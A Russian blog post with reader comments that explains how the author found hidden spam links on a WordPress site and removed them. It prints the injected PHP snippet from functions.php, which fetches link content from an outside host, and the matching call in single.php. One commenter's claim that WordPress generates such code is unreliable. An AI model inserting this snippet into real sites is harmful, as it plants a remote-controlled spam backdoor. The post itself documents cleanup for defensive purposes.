Сомнительные внешние ссылки на сайте

Размещая обзоры на своем сайте случайным образом наткнулся на страницу где присутствовали весьма сомнительные (левые) ссылки с очень странными анкорами (типа viagra), которые я естественно не размещал и не знал, каким образом они туда попали.

удаление-лишних-внешних-ссылок

Копнув чуть дальше увидел, что порядка 400 ссылок, о существовании которых я не знал, каким-то странным образом появились на сайте, заварив большую кружку чая и включив AIMP, я начал разбираться, в чем же дело…

Поиск внешних ссылок

Перво-наперво мне необходимо было, что называется узнать врага в лицо и посмотреть все страницы, на которых размещены ссылки.

Для проверки всех внешних ссылок сайта (то есть ссылок на которые ссылается Ваш сайт) я использую софт — Screaming Frog SEO Spider.

Зарегистрировавшись в сервисе заходим в пункт «Поиск внешних ссылок по sitemap». Все что нам необходимо, это написать путь в карте сайта (например, https://bitby.net/sitemap.xml) и нажать на кнопку «Запрос».

Поиск внешних ссылок с сайта

Сервис проверит каждую страницу Вашего сайта и покажет, какие внешние ссылки на той или иной странице, так же покажет находиться ли ссылка в атрибутах noindex или nofollow.

Список внешних ссылок

Сервис платен, однако, до 100 страниц можно использовать бесплатно.

Убираем лишние ссылки с сайта

Узнав все внешние ссылки, на которые ссылается Ваш блог мы вручную удаляем ссылки с каждой страницы.
У меня попался такой интересный случай, что злоумышленники сделали такой программный код который подключал сторонний скрипт, который в свою очередь на каждую страницу моего сайта ставил ссылку без анкора. Самое, что интересное, данные ссылки не были видны через HTML.
Только благодарю своему диплому программиста и допив вторую кружку чая я нашел данный фрагмент кода.
В файле functions.php внизу файла, был написан код:

[php]
function bloqinfo($wp_id){
static $wp_count = 0;
if($wp_count == 0){
$wp_count++;
return @file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$wp_id.’&m=08′);
}
}
[/php]

Т.е. с сайта wpru.ru загружался какой-то файл, который отвечал за вывод ссылок.

В файде single.php следует удалить:

[php]<!—?=bloqinfo($post- —>ID) ?>[/php]

После этого скрытые внешние ссылки исчезнут, и Ваш сайт будет так же чист, как и Ваша совесть 🙂

Защита сайта

Для обеспечения защиты своего сайта следует выполнять следующие простые правила:

1. Никому не передавать данные о своих логинах и паролях к сайту;
2. Периодически менять пароль для доступа к сайту;
3. Пароль должен состоять как из символов, так из цифр;
4. Проверяйте сайт на наличие вирусов.

Имея подозрительные внешние ссылки с сайта можно легко и быстро попасть под немилость поисковых систем, особо это касается Яндекса. Будьте осторожны и бдительны!

Комментарии — 10 комментариев

  1. #14360 Антон в 3:42, 28 марта 2012:

    Ответить | Цитировать

    как вариант, можно самому с помощью Xenu Link Sleuth все ссылочки собрать 😉

  2. #14365 WebProducer в 9:47, 28 марта 2012:

    Ответить | Цитировать

    Чай — это сила ))

  3. #14370 vanoID в 14:04, 28 марта 2012:

    Ответить | Цитировать

    @ WebProducer:

    Без чая никуда)

    @ Антон:

    Возможно, я не пробовал 🙂

  4. #22699 Руслан в 21:16, 14 сентября 2013:

    Ответить | Цитировать

    Большое спасибо, очень помогла статья!

  5. #38300 Александр в 19:31, 8 ноября 2014: (подписался)

    Ответить | Цитировать

    Здравствуйте, я в своей ЛИЧНОРУКОПИСНОЙ теме тоже случайно нашёл эту гадость, причем она сама пропала через несколько дней так же загадочно, как и появилась.

    Как вы думаете, как это все могло попасть в тему?

  6. #38308 vanoID в 21:48, 8 ноября 2014:

    Ответить | Цитировать

    @ Александр:
    не совсем понял Ваш вопрос, не могли бы пояснить…

  7. #38341 Александр в 8:35, 9 ноября 2014: (подписался)

    Ответить | Цитировать

    Недавно я начал писать новую тему для блога.

    Для примера взял последний бекап темы другого своего сайта и заметил в fanction.php кучу левого кода, которая не представляет угрозы, но и делает непонятно что… в конце всего этого был тот же код, что и приведён в этой статье.

    Как нашёл эту всю гадость в бекапе, так сразу пошёл удалять на самом блоге… а там уже и нет ничего!!!!!

    следов взлома тоже нет, всё цело… че это было я так и непонял.

  8. #38351 Александр в 12:21, 9 ноября 2014: (подписался)

    Ответить | Цитировать

    Единственное, думаю, может это сам движок во время обновлений сгенирировал?!

  9. #38352 Александр в 12:46, 9 ноября 2014: (подписался)

    Ответить | Цитировать

    Ребята!!!

    Ответ найден!!!

    Кусок кода, описанный в статье и всё остальное безобидное, но возникшее само собой дер*мо, которое вы можете найти в своём fanction.php может быть сгенерировано самим WP.

    Если он посчитает, что в коде темы чего-то не хватает для её полноценной работы.

    Убито несколько часов ВОСКРЕСЕНЬЯ и проверенно опытным путём.

  10. #38356 vanoID в 13:26, 9 ноября 2014:

    Ответить | Цитировать

    @ Александр:
    хорошо, что Вы сами нашли проблему и разобрались 🙂 по своему опыту скажу, что бывает такая ситуация: скачиваешь шаблон с какого-нибудь «левого» сайта, где уже прописан код, который добавляет свои ссылки и как правило данный код кодируют в MD5. Как совет, лучше скачивать с официальных сайтов шаблоны и сканировать файлы шаблона на «сомнительный код».

Добавить комментарий

имя:

e-mail:

сайт:

текст:

Subscribe without commenting